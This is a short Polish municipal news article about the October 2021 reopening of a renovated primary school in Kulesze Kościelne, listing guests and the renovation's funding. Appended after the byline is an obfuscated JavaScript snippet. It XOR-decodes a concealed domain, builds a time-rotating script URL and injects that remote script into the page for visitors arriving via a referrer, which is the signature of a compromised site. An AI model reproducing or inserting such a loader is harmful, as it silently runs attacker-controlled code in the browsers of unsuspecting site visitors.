Aktualności

Uroczyste otwarcie wyremontowanej Szkoły Podstawowej w Kuleszach Kościelnych.

paź 27, 2021 | Aktualności

W piątek 22 października 2021 r. w Gminie Kulesze Kościelne odbyło się uroczyste otwarcie wyremontowanej Szkoły Podstawowej im. Kard. Stefana Wyszyńskiego. W uroczystościach oprócz uczniów i nauczycieli udział wzięło wielu znakomitych gości min. Posłowie na Sejm RP Jarosław Zieliński, Stefan Krajewski, Paweł Krutul, Radny Sejmiku Województwa Podlaskiego Jerzy Leszczyński, Starosta Wysokomazowiecki Bogdan Zieliński, Arkadiusz Kalinowski Radny Rady Powiatu Wysokomazowieckiego, Komendant PSP w Wysokiem Mazowieckiem bryg. Adam Frankowski, Prezes Banku Spółdzielczego w Wysokiem Mazowieckiem Tadeusz Nosek, Joanna Zawistowska- Śliwowska Dyrektor Poradni Psychologiczno- Pedagogicznej w Wysokiem Mazowieckiem,  Ks. Krzysztof Konopka Proboszcz Parafii w Kuleszach Kościelnych, Ks. Wikariusz  Grzegorz Stankowski, Marcin Granaszewski Właściciel Firmy MIKABO, Andrzej Michalski Inspektor Nadzoru, Projektant Budowy Przemysław Borys, Radni Rady Gminy, Sołtysi, pracownicy Urzędu Gminy, Rada Rodziców, emerytowani nauczyciele, Grażyna Wnorowska.

Początek uroczystości rozpoczął się na holu, gdzie wszystkich gości powitał Wójt Gminy Stefan Grodzki. Następnie trójka uczniów klas pierwszych – Marcelina Wnorowska, Hubert Sokołowski i Ania Dąbrowska – dokonała symbolicznego otwarcia pomieszczeń szkoły po generalnym remoncie. Chwilę później zostały one poświęcone przez proboszcza ks. Krzysztofa Konopkę.

Następnie uroczystość przeniosła się do hali sportowej szkoły, gdzie gospodyni obiektu, dyrektor Jolantyna Kamińska oraz Wójt Gminy Stefan Grodzki powitali wszystkich gości oraz podziękowali za dobrą współpracę obecnym Parlamentarzystom a w szczególności wszystkim mieszańcom Gminy Kulesze Kościelne, którzy przekazali fundusz solecki, dzięki czemu wnieśli ogromny wkład w inwestycję. Wójt Gminy pokrótce przedstawił, iż całkowity koszt inwestycji wyniósł 2 706 934,26 zł z czego budżet Gminy: 925 282,15 zł, środki z Funduszu Sołeckiego na lata 2020 – 2021: 931 652,11 zł, dotacja celowa z budżetu Województwa Podlaskiego: 350 000,00 zł, środki z Rządowego Funduszu Inwestycji Lokalnych: 500 000,00 zł.

Po przemówieniach gości odbyła się część artystyczna przygotowana przez uczniów ze Szkoły Podstawowej w Kuleszach Kościelnych, którzy wręczyli własnoręcznie wykonane laurki dla przybyłych gości.

https://ewysmaz.pl/

Mariusz Jaworowski Szkoła Podstawowa w Kuleszach Kościelnych

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);